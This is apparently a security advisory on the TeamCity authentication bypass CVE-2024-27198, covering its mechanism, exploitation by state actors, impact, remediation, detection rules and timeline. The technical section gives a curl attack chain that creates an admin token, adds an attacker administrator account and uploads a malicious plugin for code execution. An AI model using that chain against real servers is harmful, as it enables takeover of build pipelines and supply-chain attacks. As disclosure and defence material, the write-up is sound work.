Background
JetBrains TeamCity is a widely-deployed CI/CD (Continuous Integration/Continuous Deployment) server used by software development teams to automate build, test, and deployment pipelines. It is used by thousands of organisations ranging from small software companies to large enterprises and government agencies. TeamCity’s role in the software development lifecycle makes it an exceptionally high-value target: compromising a CI/CD server gives attackers the ability to inject malicious code into software artifacts, modify build pipelines, and access source code repositories and deployment credentials.
CVE-2024-27198 is a critical authentication bypass discovered by Stefan Schiller of Sonar and disclosed in March 2024. It was quickly chained with a secondary vulnerability (CVE-2024-27199, an information disclosure) and exploited at scale within hours of publication, with nation-state threat actors (APT29/Cozy Bear, DIAMOND SLEET) among the first to weaponise it.
Technical Mechanism
CVE-2024-27198 is an authentication bypass in TeamCity’s embedded web server (Tomcat). The vulnerability exists in how TeamCity handles URL routing for its REST API.
TeamCity uses a URL-based access control mechanism to determine whether a request requires authentication. Certain URL prefixes are whitelisted as publicly accessible without credentials. The bypass leverages a path traversal within URL routing: by appending a path traversal sequence to a URL that is normally restricted, an attacker can trick the authentication layer into treating the request as accessing a whitelisted endpoint.
Specifically, the vulnerable pattern is:
/app/rest/users/id:1/tokens/RPC2This endpoint — for creating user tokens — is access-controlled. However, by using a URL like:
POST /hax?jsp=/app/rest/users/id:1/tokens/RPC2;.jspThe authentication filter evaluates the URL as ending in .jsp (which may be a whitelisted pattern) while the actual routing logic processes /app/rest/..., sending the request to the admin token creation endpoint. This discrepancy between authentication evaluation and routing is the core of the bypass.
Once an attacker creates an admin token via this bypass:
# Step 1: Create admin token without authentication
curl -X POST "https://teamcity.example.com/hax?jsp=/app/rest/users/id:1/tokens/RPC2;.jsp"
# Step 2: Use the token to create an admin user
curl -X POST "https://teamcity.example.com/app/rest/users" \
-H "Authorization: Bearer <obtained_token>" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"P@ss!","email":"a@b.com","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'
# Step 3: Upload a malicious plugin for RCE
curl -X POST "https://teamcity.example.com/admin/pluginUpload.html" \
-H "Authorization: Bearer <obtained_token>" \
-F "file=@malicious_plugin.zip"TeamCity plugins execute arbitrary Java code in the server’s JVM context, granting full RCE.
Real-World Exploitation Evidence
JetBrains and Microsoft reported exploitation within hours of the March 4, 2024 advisory. Two distinct nation-state campaigns were documented:
APT29 (Cozy Bear / Russian SVR):
- Microsoft reported APT29 exploiting CVE-2024-27198 to compromise TeamCity servers and use them as a launchpad for further intrusions.
- Tactics mirrored the 2021 SolarWinds supply chain attack methodology: gaining access to build servers to potentially inject malicious code into software products.
- Implanted persistent access via legitimate-looking admin accounts and modified build configurations.
DIAMOND SLEET (North Korea / Lazarus Group affiliate):
- Microsoft tracked DIAMOND SLEET exploiting the vulnerability to deploy DTrack malware and other backdoors.
- Post-exploitation focused on credential harvesting from build pipelines and source code repositories.
Criminal actors:
- Multiple ransomware groups and initial access brokers also weaponised the vulnerability for opportunistic access sales.
- Rapid exploitation across publicly-exposed TeamCity instances globally.
Impact Assessment
Compromising a TeamCity server has cascading downstream effects:
- Supply chain attack surface: Build pipelines can be modified to inject malicious code into compiled software artifacts before they reach customers.
- Source code theft: TeamCity has read access to all connected repositories; attackers can exfiltrate proprietary codebases.
- Credential harvesting: Build pipelines store credentials for deployment targets, cloud providers, package registries, and test environments — all accessible via the compromised TeamCity instance.
- Downstream system access: TeamCity is typically authorised to deploy to production environments; attackers inherit this access.
- Artifact tampering: Software packages signed and distributed from a compromised build pipeline are trusted by downstream consumers.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| TeamCity On-Premises | All versions before 2023.11.4 | 2023.11.4 |
| TeamCity Cloud | Patched by JetBrains | N/A (auto-updated) |
The vulnerability affects all TeamCity On-Premises installations regardless of operating system (Windows, Linux, macOS). TeamCity Cloud was patched automatically.
Remediation Steps
-
Upgrade to TeamCity 2023.11.4 or later: This is the only complete fix. JetBrains also released a security patch plugin for older versions.
-
Apply the security patch plugin (if immediate upgrade is not possible): JetBrains published a standalone
.zipplugin that patches the vulnerability without a full upgrade:- Download from JetBrains security advisory page
- Install via
Administration > Plugins > Upload plugin zip
-
Review admin accounts: After patching, audit all administrator accounts for any created after your last known-good state:
# Via TeamCity API curl "https://teamcity.example.com/app/rest/users?locator=role:SYSTEM_ADMIN" \ -H "Authorization: Bearer <your_token>" -
Review build configurations for tampering: Check all build step configurations for unexpected script additions or modified artifact publishing steps.
-
Rotate all secrets stored in TeamCity: Treat all credentials, tokens, and certificates stored in TeamCity parameters as compromised.
-
Restrict network access: Ensure TeamCity admin UI is not internet-accessible; place behind VPN or IP allowlist.
Detection Guidance
Log sources:
- TeamCity
teamcity-server.logandteamcity-access.log(typically in<TeamCity data directory>/logs/) - System logs for unexpected process execution
- Active Directory / LDAP audit logs for account changes
Suspicious patterns in access logs:
POST /hax?jsp=
POST /app/rest/users.*tokens
POST /admin/pluginUpload.htmlIndicators of Compromise:
- Unexpected administrator accounts created after a specific date
- New or modified plugins in
<TeamCity data dir>/plugins/ - Build configurations modified without change records
- Unusual outbound connections from the TeamCity service account
Suricata signature:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"TeamCity CVE-2024-27198 Auth Bypass"; flow:established,to_server; http.uri; content:"?jsp="; content:"/app/rest/"; distance:0; within:50; sid:9000027; rev:1;)Timeline
| Date | Event |
|---|---|
| February 2024 | Sonar (Stefan Schiller) discovers and reports vulnerability to JetBrains |
| March 4, 2024 | JetBrains releases patch (2023.11.4) and security advisory |
| March 4, 2024 | CISA adds CVE-2024-27198 to KEV catalogue |
| March 4–5, 2024 | Mass exploitation begins; PoC published within hours |
| March 7, 2024 | Microsoft publishes report attributing exploitation to APT29 and DIAMOND SLEET |
| March 2024 | CISA, FBI, and international partners issue joint advisory |